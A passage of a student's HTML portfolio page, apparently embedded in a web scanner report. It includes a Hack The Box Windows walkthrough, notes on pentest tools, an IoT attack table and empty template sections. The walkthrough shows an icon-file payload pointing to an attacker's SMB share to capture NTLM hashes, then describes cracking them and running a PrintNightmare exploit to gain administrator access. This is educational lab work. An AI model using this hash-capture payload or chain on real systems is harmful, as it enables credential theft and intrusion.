                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
           user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
          <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
           <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
          <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
           </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
           <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          000613396
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        14. GET https://beekmans.dev/
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          080804898, which evaluates to: 1972-07-24 06:48:18

          Request
          Request line and header section (224 bytes)
          GET https://beekmans.dev/ HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
